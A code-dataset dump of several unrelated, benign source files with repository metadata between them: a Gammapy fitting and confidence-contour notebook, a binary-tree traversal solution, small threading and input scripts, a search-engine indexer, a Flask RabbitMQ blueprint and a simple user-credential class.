# The available options of the optimization methods are described on the following page https://cxc.cfa.harvard.edu/sherpa/methods/opt_methods.html
# In[ ]:
get_ipython().run_cell_magic('time', '', 'sherpa_opts = {"method": "simplex", "ftol": 1e-3, "maxfev": int(1e4)}\nresults_simplex = fit.run(backend="sherpa", optimize_opts=sherpa_opts)')
# For the "minuit" backend see https://iminuit.readthedocs.io/en/latest/reference.html for a detailed description of the available options. If there is an entry ‘migrad_opts’, those options will be passed to [iminuit.Minuit.migrad](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.migrad). Additionally you can set the fit tolerance using the [tol](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.tol
# ) option. The minimization will stop when the estimated distance to the minimum is less than 0.001*tol (by default tol=0.1). The [strategy](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.strategy) option changes the speed and accuracy of the optimizer: 0 fast, 1 default, 2 slow but accurate. If you want more reliable error estimates, you should run the final fit with strategy 2.
#
# In[ ]:
get_ipython().run_cell_magic('time', '', 'minuit_opts = {"tol": 0.001, "strategy": 1}\nresult_minuit = fit.run(backend="minuit", optimize_opts=minuit_opts)')
# ## Fit quality assessment
#
# There are various ways to check the convergence and quality of a fit. Among them:
#
# - Refer to the automatically-generated results dictionary
# In[ ]:
print(result_scipy)
# In[ ]:
print(results_simplex)
# In[ ]:
print(result_minuit)
# - Check the trace of the fit e.g. in case the fit did not converge properly
# In[ ]:
result_minuit.trace
# - Check that the fitted values and errors for all parameters are reasonable, and no fitted parameter value is "too close" - or even outside - its allowed min-max range
# In[ ]:
result_minuit.parameters.to_table()
# - Plot fit statistic profiles for all fitted parameters, using `~gammapy.modeling.Fit.stat_profile()`. For a good fit and error estimate each profile should be parabolic
# In[ ]:
total_stat = result_minuit.total_stat
for par in dataset_hess.models.parameters:
if par.frozen is False:
profile = fit.stat_profile(parameter=par)
plt.plot(
profile[f"{par.name}_scan"], profile["stat_scan"] - total_stat
)
plt.xlabel(f"{par.unit}")
plt.ylabel("Delta TS")
plt.title(f"{par.name}: {par.value} +- {par.error}")
plt.show()
plt.close()
# - Inspect model residuals. Those can always be accessed using `~Dataset.residuals()`, which will return an array in case the fitted `Dataset` is a `SpectrumDataset` and a full cube in case of a `MapDataset`. For more details, we refer here to the dedicated fitting tutorials: [analysis_3d.ipynb](analysis_3d.ipynb) (for `MapDataset` fitting) and [spectrum_analysis.ipynb](spectrum_analysis.ipynb) (for `SpectrumDataset` fitting).
# ## Covariance and parameters errors
#
# After the fit the covariance matrix is attached to the model. You can get the error on a specific parameter by accessing the `.error` attribute:
# In[ ]:
crab_model.spectral_model.alpha.error
# As an example, this step is needed to produce a butterfly plot showing the envelope of the model taking into account parameter uncertainties.
# In[ ]:
energy_range = [1, 10] * u.TeV
crab_spectrum.plot(energy_range=energy_range, energy_power=2)
ax = crab_spectrum.plot_error(energy_range=energy_range, energy_power=2)
# ## Confidence contours
#
#
# In most studies, one wishes to estimate parameters distribution using observed sample data.
# A 1-dimensional confidence interval gives an estimated range of values which is likely to include an unknown parameter.
# A confidence contour is a 2-dimensional generalization of a confidence interval, often represented as an ellipsoid around the best-fit value.
#
# Gammapy offers two ways of computing confidence contours, in the dedicated methods `Fit.minos_contour()` and `Fit.stat_profile()`. In the following sections we will describe them.
# An important point to keep in mind is: *what does a $N\sigma$ confidence contour really mean?* The answer is it represents the points of the parameter space for which the model likelihood is $N\sigma$ above the minimum. But one always has to keep in mind that **1 standard deviation in two dimensions has a smaller coverage probability than 68%**, and similarly for all other levels. In particular, in 2-dimensions the probability enclosed by the $N\sigma$ confidence contour is $P(N)=1-e^{-N^2/2}$.
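# In[ ]:


# Quick numerical check (an added illustration, not part of the original text)
# of the 2D coverage probability $P(N)=1-e^{-N^2/2}$ quoted above:
for n_sigma in (1, 2, 3):
    coverage = 1 - np.exp(-n_sigma ** 2 / 2)
    print(f"{n_sigma} sigma contour encloses {coverage:.1%} of the probability")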
# ### Computing contours using `Fit.minos_contour()`
# After the fit, MINUIT offers the possibility to compute the confidence contours.
# Gammapy provides an interface to this functionality through the `Fit` object using the `minos_contour` method.
# Here we define a function to automate contour production for the different parameters and confidence levels (expressed in terms of sigma):
# In[ ]:
def make_contours(fit, result, npoints, sigmas):
cts_sigma = []
for sigma in sigmas:
contours = dict()
for par_1, par_2 in combinations(["alpha", "beta", "amplitude"], r=2):
contour = fit.minos_contour(
result.parameters[par_1],
result.parameters[par_2],
numpoints=npoints,
sigma=sigma,
)
contours[f"contour_{par_1}_{par_2}"] = {
par_1: contour[par_1].tolist(),
par_2: contour[par_2].tolist(),
}
cts_sigma.append(contours)
return cts_sigma
# Now we can compute a few contours.
# In[ ]:
get_ipython().run_cell_magic('time', '', 'sigma = [1, 2]\ncts_sigma = make_contours(fit, result_minuit, 10, sigma)')
# Then we prepare some aliases and annotations in order to make the plotting nicer.
# In[ ]:
pars = {
"phi": r"$\phi_0 \,/\,(10^{-11}\,{\rm TeV}^{-1} \, {\rm cm}^{-2} {\rm s}^{-1})$",
"alpha": r"$\alpha$",
"beta": r"$\beta$",
}
panels = [
{
"x": "alpha",
"y": "phi",
"cx": (lambda ct: ct["contour_alpha_amplitude"]["alpha"]),
"cy": (
lambda ct: np.array(1e11)
* ct["contour_alpha_amplitude"]["amplitude"]
),
},
{
"x": "beta",
"y": "phi",
"cx": (lambda ct: ct["contour_beta_amplitude"]["beta"]),
"cy": (
lambda ct: np.array(1e11)
* ct["contour_beta_amplitude"]["amplitude"]
),
},
{
"x": "alpha",
"y": "beta",
"cx": (lambda ct: ct["contour_alpha_beta"]["alpha"]),
"cy": (lambda ct: ct["contour_alpha_beta"]["beta"]),
},
]
# Finally we produce the confidence contours figures.
# In[ ]:
fig, axes = plt.subplots(1, 3, figsize=(16, 5))
colors = ["m", "b", "c"]
for p, ax in zip(panels, axes):
xlabel = pars[p["x"]]
ylabel = pars[p["y"]]
for ks in range(len(cts_sigma)):
plot_contour_line(
ax,
p["cx"](cts_sigma[ks]),
p["cy"](cts_sigma[ks]),
lw=2.5,
color=colors[ks],
label=f"{sigma[ks]}" + r"$\sigma$",
)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
plt.legend()
plt.tight_layout()
# ### Computing contours using `Fit.stat_surface()`
# This alternative method for the computation of confidence contours, although more time consuming than `Fit.minos_contour()`, is expected to be more stable. It consists of a generalization of `Fit.stat_profile()` to a 2-dimensional parameter space. The algorithm is very simple:
# - First, passing two arrays of parameters values, a 2-dimensional discrete parameter space is defined;
# - For each node of the parameter space, the two parameters of interest are frozen. This way, a likelihood value ($-2\mathrm{ln}\,\mathcal{L}$, actually) is computed, by either freezing (default) or fitting all nuisance parameters;
# - Finally, a 2-dimensional surface of $-2\mathrm{ln}(\mathcal{L})$ values is returned.
# Using that surface, one can easily compute a surface of $TS = -2\Delta\mathrm{ln}(\mathcal{L})$ and compute confidence contours.
#
# Let's see it step by step.
# First of all, we can notice that this method is "backend-agnostic", meaning that it can be run with MINUIT, sherpa or scipy as fitting tools. Here we will stick with MINUIT, which is the default choice:
# In[ ]:
optimize_opts = {"backend": "minuit", "print_level": 0}
# As an example, we can compute the confidence contour for the `alpha` and `beta` parameters of the `dataset_hess`. Here we define the parameter space:
# In[ ]:
result = result_minuit
par_1 = result.parameters["alpha"]
par_2 = result.parameters["beta"]
x = par_1
y = par_2
x_values = np.linspace(1.55, 2.7, 20)
y_values = np.linspace(-0.05, 0.55, 20)
# Then we run the algorithm, choosing `reoptimize=False` for the sake of time saving. In real life applications, we strongly recommend using `reoptimize=True`, so that all free nuisance parameters are fit at each grid node. This is the correct way, statistically speaking, of computing confidence contours, but it is expected to be time consuming.
# In[ ]:
stat_surface = fit.stat_surface(
x, y, x_values, y_values, reoptimize=False, **optimize_opts
)
# In order to easily inspect the results, we can convert the $-2\mathrm{ln}(\mathcal{L})$ surface to a surface of statistical significance (in units of Gaussian standard deviations from the surface minimum):
# In[ ]:
# Compute TS
TS = stat_surface["stat_scan"] - result.total_stat
# In[ ]:
# Compute the corresponding statistical significance surface
gaussian_sigmas = np.sqrt(TS.T)
# Notice that, as explained before, the $1\sigma$ contour obtained this way will not contain 68% of the probability, but rather
# In[ ]:
# Compute the corresponding statistical significance surface
# p_value = 1 - st.chi2(df=1).cdf(TS)
# gaussian_sigmas = st.norm.isf(p_value / 2).T
# Finally, we can plot the surface values together with contours:
# In[ ]:
fig, ax = plt.subplots(figsize=(8, 6))
# We choose to plot 1 and 2 sigma confidence contours
levels = [1, 2]
contours = plt.contour(gaussian_sigmas, levels=levels, colors="white")
plt.clabel(contours, fmt="%.0f$\,\sigma$", inline=3, fontsize=15)
im = plt.imshow(
gaussian_sigmas,
extent=[0, len(x_values) - 1, 0, len(y_values) - 1],
origin="lower",
)
fig.colorbar(im)
plt.xticks(range(len(x_values)), np.around(x_values, decimals=2), rotation=45)
plt.yticks(range(len(y_values)), np.around(y_values, decimals=2));
# Note that, if computed with `reoptimize=True`, this plot would be completely consistent with the third panel of the plot produced with `Fit.minos_contour` (try!).
# Finally, it is always worth remembering that confidence contours are approximations. In particular, when the parameter range boundaries are close to the contour lines, the statistical meaning of the contours is not well defined. That's why we advise to always choose a parameter space that can contain the contours you're interested in.
# In[ ]:
|
[
"axel.donath@mpi-hd.mpg.de"
] |
axel.donath@mpi-hd.mpg.de
|
06d3b8b17c46a0ae3faf7387123f73c73bea8d78
|
4766d241bbc736e070f79a6ae6a919a8b8bb442d
|
/20200215Python-China/0094. Binary Tree Inorder Traversal.py
|
08893a77b8777c433e17edf90f755b8b4b58c958
|
[] |
no_license
|
yangzongwu/leetcode
|
f7a747668b0b5606050e8a8778cc25902dd9509b
|
01f2edd79a1e922bfefecad69e5f2e1ff3a479e5
|
refs/heads/master
| 2021-07-08T06:45:16.218954
| 2020-07-18T10:20:24
| 2020-07-18T10:20:24
| 165,957,437
| 10
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
'''
Given a binary tree, return the inorder traversal of its nodes' values.
Example:
Input: [1,null,2,3]
1
\
2
/
3
Output: [1,3,2]
Follow up: Recursive solution is trivial, could you do it iteratively?
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def inorderTraversal(self, root: TreeNode) -> List[int]:
rep=[]
self.getInOrderTra(root,rep)
return rep
def getInOrderTra(self,root,rep):
if not root:
return
self.getInOrderTra(root.left,rep)
rep.append(root.val)
self.getInOrderTra(root.right,rep)
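# Iterative variant (an added sketch answering the follow-up above, not part of
# the original submission): replace the recursion with an explicit stack.
class SolutionIterative:
    def inorderTraversal(self, root: TreeNode) -> List[int]:
        rep, stack = [], []
        node = root
        while node or stack:
            while node:              # descend to the leftmost unvisited node
                stack.append(node)
                node = node.left
            node = stack.pop()       # visit it
            rep.append(node.val)
            node = node.right        # then traverse its right subtree
        return rep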
|
[
"noreply@github.com"
] |
yangzongwu.noreply@github.com
|
4c9df0aef998f4392465ebfdb2da7513c530cef6
|
5cb820487419a5e06345590f5f563a09e1949b42
|
/F0003a.py
|
03fccecf0051f01d2f97c39f5355f20102edf0fe
|
[] |
no_license
|
loczylevi/-f0003
|
a84921d0d07dcc3e27e48b18f1e031d9f3dc73e8
|
12ed7125fd0700d8b777c0985c70144335007423
|
refs/heads/master
| 2023-01-11T23:01:45.050216
| 2020-11-08T10:30:43
| 2020-11-08T10:30:43
| 310,523,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
vezetéknév = input('What is your last name?')
keresztnév = input('What is your first name?')
print('Your name is ', vezetéknév, keresztnév,)
|
[
"loczy2003@gmail.com"
] |
loczy2003@gmail.com
|
b668d29096563112db9bbe2fb4adc91d5dcac26e
|
34354acd20aba20dc78909edb80376d82ee31efb
|
/partsix/TestQueue.py
|
f775be4e01a141aeb458bf93d9d1a12a482c8fe5
|
[] |
no_license
|
yzw1102/study_python
|
40de23db9f4f5270d7b8fae0739148e50e4792d7
|
d8cc929475827925d9135167b5afd5a47232efd0
|
refs/heads/master
| 2020-04-13T10:00:16.405293
| 2019-01-09T07:30:22
| 2019-01-09T07:30:22
| 163,126,969
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
from queue import Queue
from threading import Thread
import time
isRead = True
def write(q):
    for value in ['ye1','ye2','ye3']:
        print('the value write in queue is : {0} '.format(value))
        q.put(value)
        time.sleep(1)
    q.put(None)  # sentinel value: signals the reader that the writer is done
def read(q):
    while isRead:
        value = q.get(True)
        if value is None:  # stop on the sentinel instead of blocking forever
            break
        print('the value get from queue is : {0}'.format(value))
if __name__ == '__main__':
q = Queue()
t1 = Thread(target = write,args = (q,))
t2 = Thread(target = read, args = (q,))
t1.start()
t2.start()
|
[
"ye19861102"
] |
ye19861102
|
e5fefc6b8e0ec0d00e467d6808038193d92e8aa7
|
683b73e0c95c755a08e019529aed3ff1a8eb30f8
|
/machina/apps/forum_moderation/__init__.py
|
f1911a14dbd6195e896b647fa949fa08a0c6abce
|
[
"BSD-3-Clause"
] |
permissive
|
DrJackilD/django-machina
|
b3a7be9da22afd457162e0f5a147a7ed5802ade4
|
76858921f2cd247f3c1faf4dc0d9a85ea99be3e1
|
refs/heads/master
| 2020-12-26T08:19:09.838794
| 2016-03-11T03:55:25
| 2016-03-11T03:55:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
# -*- coding: utf-8 -*-
# Standard library imports
# Third party imports
# Local application / specific library imports
default_app_config = 'machina.apps.forum_moderation.registry_config.ModerationRegistryConfig'
|
[
"morgan.aubert@zoho.com"
] |
morgan.aubert@zoho.com
|
818def7bc87a5c0bcf797c372ee7fd1af118ce87
|
cebc0b59e26dc564de8eade8510b1d7cd01cd46a
|
/bspider/master/controller/rabbitmq.py
|
d0cbcbfbc3221e15006b6946d16b74a3335d8272
|
[
"BSD-3-Clause"
] |
permissive
|
littlebai3618/bspider
|
0f18548ef66fbb06a8a95cbcfdaf05db5990c7d1
|
ff4d003cd0825247db4efe62db95f9245c0a303c
|
refs/heads/master
| 2023-04-26T14:47:43.228774
| 2021-05-13T02:58:35
| 2021-05-13T02:58:35
| 255,865,935
| 2
| 0
|
BSD-3-Clause
| 2021-05-12T02:11:18
| 2020-04-15T09:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 660
|
py
|
from flask import Blueprint
from bspider.core.api import auth
from bspider.master.service.rabbitmq import RabbitMQService
rabbitmq = Blueprint('rabbitmq_bp', __name__)
rabbitmq_service = RabbitMQService()
@rabbitmq.route('/project/<int:project_id>', methods=['GET'])
@auth.login_required
def project_queue_info(project_id):
    """Detailed information about the queues related to a project"""
return rabbitmq_service.get_project_queue_info(project_id)
@rabbitmq.route('/project/purge/<int:project_id>', methods=['DELETE'])
@auth.login_required
def purge_project_queue(project_id):
    """Purge the project's queue of pending download links"""
return rabbitmq_service.purge_project_queue(project_id)
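# Registration sketch (an added note; the hosting Flask app object is an
# assumption, not part of this module): blueprints like the one above are
# typically mounted on the application with
#     app.register_blueprint(rabbitmq, url_prefix='/rabbitmq')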
|
[
"baishanglin@renrenche.com"
] |
baishanglin@renrenche.com
|
004e7568fbdb3e5a639501d4dd91b45601254179
|
702f403e33c94b32bd95e9284349e3c5aa751361
|
/TextAcquisition.py
|
6823d079b79c833821e7b6ae76b37cacd842ea56
|
[] |
no_license
|
Timmichi/ICSearch-Engine
|
71bcc0cefe24afe974ca13f8a6ee15d254776c43
|
471f3b9cd83fbfe2686037f285cdfb787e003146
|
refs/heads/main
| 2023-03-27T01:30:04.997265
| 2021-03-24T22:07:05
| 2021-03-24T22:07:05
| 351,213,421
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,935
|
py
|
import json
import re
from bs4 import BeautifulSoup
import os
import sys
import math
from nltk.stem import PorterStemmer
# Index = Token : [(DocID, ((SearchWord*Priority)+(SearchWord*BasicWords)), [Positions in the text])]
# DocID = DocID : URL
# IndexMarkers = InitialLetter : (StartPosition,EndPosition)
# DocIDMarkers = lineNumber : (StartPosition,EndPosition)
def tokenize(token):
tokens = []
try:
ps = PorterStemmer()
tokens += [ps.stem(token.lower())
for token in re.findall('[a-zA-Z0-9]+', token)]
return tokens
except:
print("ERROR: Tokenize Function Error")
return tokens
def computeWordData(tokens):
if not isinstance(tokens, list):
return {}
freq = {}
positions = {}
for i, t in enumerate(tokens):
if t in freq.keys():
freq[t] += 1
positions[t].append(i)
else:
freq[t] = 1
positions[t] = [i]
return freq, positions
def updateIndex(index, tokenFrequency, totalPositions, importantFrequency, totalWordsInDoc, docID):
for k, v in tokenFrequency.items():
# calculate tf score
tf = v
if tf > 0 and k in importantFrequency:
tf = 2 + math.log10(tf) + math.log(importantFrequency[k])
elif tf > 0 and k not in importantFrequency:
tf = 1 + math.log10(tf)
# add tf score and DocID to posting
if k in index.keys():
index[k].append((docID, tf))
else:
index[k] = [(docID, tf)]
return index
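# Worked example (an added illustration) of the tf weighting above: a term that
# occurs 10 times in a document, 3 of them inside "important" tags
# (strong/h1/h2/h3/title/b), scores 2 + log10(10) + ln(3) ~= 4.10, while the
# same term with no important occurrences scores 1 + log10(10) = 2.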
def writeIndex(index):
for k, v in index.items():
directory = ".\letters"
fileName = k + ".txt"
filePath = os.path.join(directory, fileName)
if not os.path.exists(filePath):
f = open(filePath, "w", encoding='utf-8')
for key, value in sorted(v.items(), key=lambda posting: len(posting[1]), reverse=True):
f.write(f"{key} {str(value)}\n")
f.close()
continue
storedData = {}
f = open(filePath, "r", encoding='utf-8')
for txt in f:
val = re.search("^([a-zA-Z0-9]+) (.+)", txt)
token = val.group(1)
posting = eval(val.group(2))
storedData[token] = posting
f.close()
f = open(filePath, "w", encoding='utf-8')
for token, posting in v.items():
if token in storedData:
storedData[token] = storedData[token] + posting
else:
storedData[token] = posting
sortedTuple = sorted(storedData.items(),
key=lambda posting: len(posting[1]), reverse=True)
for k, v in sortedTuple:
f.write(f"{k} {str(v)}\n")
f.close()
def writeDocID(docID, IDline):
for k, v in docID.items():
directory = "." + "\\" + "numbers"
fileName = str(IDline) + ".txt"
filePath = os.path.join(directory, fileName)
f = open(filePath, "a", encoding='utf-8')
f.write(f"{k} {v}\n")
f.close()
def mwMarkers(marker, directory, mergeFile):
endPos = 0
for root, dirs, files in os.walk(directory, topdown=False):
for file in files:
filePath = os.path.join(directory, file)
k = file[0:-4]
with open(filePath, "r", encoding='utf-8', errors='ignore') as f, open(mergeFile, "a", encoding='utf-8') as f2:
for line in f:
f2.write(line)
f2.close()
startPos = endPos
f.seek(0, 2)
endPos = f.tell() + startPos
f.close()
v = (startPos, endPos)
marker[k] = v
def convertIndexToAlphaIndex(index):
alphaIndex = {}
for k, v in index.items():
key = k[0]
if key in alphaIndex.keys():
alphaIndex[key][k] = v
else:
alphaIndex[key] = {}
alphaIndex[key][k] = v
return alphaIndex
def getTitleParagraph(soup):
title = soup.find('title')
if title:
title = soup.find('title').getText()
paragraph = soup.findAll('p')
if paragraph:
preParagraph = soup.findAll('p')
paragraph = ''
for p in preParagraph:
for x in p.findAll(text=True):
paragraph += x
else:
paragraph = soup.getText()
paragraph = re.findall("[A-Z].*?[\.!?,]", paragraph,
re.MULTILINE | re.DOTALL)
if title == None and paragraph:
title = ''
if len(paragraph) < 2:
loop = len(paragraph)
else:
loop = 2
for i in range(0, loop):
title += paragraph[i]
if title and len(title) > 65:
l = title.split(" ")
title = ''
if len(l) < 5:
loop = len(l)
else:
loop = 5
for i in range(0, loop):
title += ' ' + l[i]
title += '...'
if paragraph:
tempParagraph = ''
if len(paragraph) < 5:
loop = len(paragraph)
else:
loop = 5
for i in range(0, loop):
tempParagraph += paragraph[i]
paragraph = tempParagraph[0:250] + "..."
return title, paragraph
def getCondensedUrl(preUrl):
preUrl = preUrl.split("//")
preUrl = preUrl[1]
preUrl = preUrl.split("/")
url = f'{preUrl[0]}'
preUrl.pop(0)
iters = 0
while len(url) < 25 and iters < len(preUrl):
segment = preUrl[iters]
if len(segment) > 10:
url += " > " + segment[0:10] + "..."
else:
url += " > " + segment
iters += 1
return url
filePaths = list()
index = dict()
docID = dict()
for root, dirs, files in os.walk(".\DEV", topdown=False):
for name in files:
filePaths.append(os.path.join(root, name))
fileNumber = 1
initIDLine = 1
currIDLine = initIDLine
total = len(filePaths)
count = 0
for filePath in filePaths:
try:
with open(filePath) as f:
data = json.load(f)
soup = BeautifulSoup(data["content"], "html.parser")
# computes frequency of tokens that are "important"
importantList = ["strong", "h1", "h2", "h3", "title", "b"]
importantText = [words.text.strip()
for words in soup.findAll(importantList)]
importantText = ' '.join([elem for elem in importantText])
importantToken = tokenize(importantText)
importantFrequency = computeWordData(importantToken)[0]
url = data["url"]
con = getCondensedUrl(url)
title, paragraph = getTitleParagraph(soup)
docID[fileNumber] = [url, con, title, paragraph]
text = soup.getText()
fileToken = tokenize(text)
totalWordsInDoc = len(fileToken)
tokenFrequency, totalPositions = computeWordData(fileToken)
updateIndex(index, tokenFrequency, totalPositions,
importantFrequency, totalWordsInDoc, fileNumber)
print(int(float(fileNumber)*100/float(total)), "%")
fileNumber += 1
count += 1
currIDLine += 1
# At 1000 iterations, store index/docID, clear index/docID and reset count
if count == 1000:
# key is sorted by alphanumeric characters, values are the postings for tokens that start with those characters
aIndex = convertIndexToAlphaIndex(index)
writeIndex(aIndex)
writeDocID(docID, initIDLine)
count = 0
initIDLine = currIDLine
docID.clear()
index.clear()
aIndex.clear()
except:
print("Error: Error opening JSON file and using BeautifulSoup")
break
# writes remaining index (iteration that didn't make it to 1000)
if index:
aIndex = convertIndexToAlphaIndex(index)
writeIndex(aIndex)
writeDocID(docID, initIDLine)
docID.clear()
index.clear()
aIndex.clear()
print(len(filePaths))
print(len(index))
print(sys.getsizeof(index))
# creates indexMarker.txt and merges index files in index.txt
indexMarker = dict()
indexDirectory = ".\letters"
mergedIndexFile = "index.txt"
mwMarkers(indexMarker, indexDirectory, mergedIndexFile)
# creates docIDMarker.txt and merges docID files in docID.txt
docIDMarker = dict()
docIDDirectory = "." + "\\" + "numbers"
mergedDocIDFile = "docID.txt"
mwMarkers(docIDMarker, docIDDirectory, mergedDocIDFile)
# writes markers to files
f = open("indexMarkers.txt", "w", encoding='utf-8')
f2 = open("docIDMarkers.txt", "w", encoding='utf-8')
f.write(str(indexMarker))
f2.write(str(docIDMarker))
|
[
"noreply@github.com"
] |
Timmichi.noreply@github.com
|
85190e278f5252ba76b1a7efadbcd85d7aafd277
|
cdf782224f9b74cf8acce919406d03791254fd3c
|
/assignment3/main.py
|
c17bd67d590ec107763c46e32b476e5acfcc9709
|
[] |
no_license
|
tollefj/information-retrieval
|
1bcc46e9fcc15c74ee8dccb31a015935d7e850a7
|
43535384ace262d0b293c26d249b11622f18e470
|
refs/heads/master
| 2022-07-14T22:11:06.716504
| 2017-10-28T17:10:39
| 2017-10-28T17:10:39
| 106,025,641
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
from _gensim import GenSim
if __name__ == '__main__':
gs = GenSim()
gs.read_stopwords()
gs.load()
gs.build_dictionary()
gs.build_bag()
gs.build_tfidf_model()
gs.build_lsi_model()
|
[
"tollefj@gmail.com"
] |
tollefj@gmail.com
|
52d3a05067138b36faf6b476467edbebd184d716
|
622bd4fb4cb50361a5e887544d92a04debb0dd2b
|
/databus/client/user.py
|
230a222d78e3993622a008dc484972f4a37cea4f
|
[
"Apache-2.0"
] |
permissive
|
tedrepo/databus
|
aec06bd28f761ca4beff290fc856e93dd2948c07
|
0f1f290c1b061175a652c3f72efc0d091a5e08c9
|
refs/heads/master
| 2022-12-01T03:10:15.182783
| 2020-08-08T18:40:54
| 2020-08-08T18:40:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,129
|
py
|
""" Module for web users """
import uuid
class Credential: # pylint: disable=R0903
""" Class defining a user credential """
def __init__(self, username: str = "Guest", password: str = "", token: str = ""):
self.username = username
self.password = password
self.token = token
def generate_token(self):
""" Generates and assigns a new token """
self.token = str(uuid.uuid1())
class User: # pylint: disable=R0903
""" Class defining a web user """
def __init__(self, credential: Credential = None):
if credential is None:
self.credential = Credential()
else:
self.credential = credential
def authenticate(self, credential: Credential) -> bool:
""" Checks if the user & password matches """
if credential.username != self.credential.username:
return False
if credential.password != "" and credential.password == self.credential.password:
return True
if credential.token != "" and credential.token == self.credential.token:
return True
return False
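# Usage sketch (an added illustration, not part of the original module):
# create a user with a generated token and authenticate a matching credential.
def _demo_auth() -> bool:
    cred = Credential(username="alice", password="s3cret")  # hypothetical values
    cred.generate_token()
    user = User(credential=cred)
    # a caller presenting the same username and a matching token is accepted
    return user.authenticate(Credential(username="alice", token=cred.token))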
|
[
"kerem@koseoglu.info"
] |
kerem@koseoglu.info
|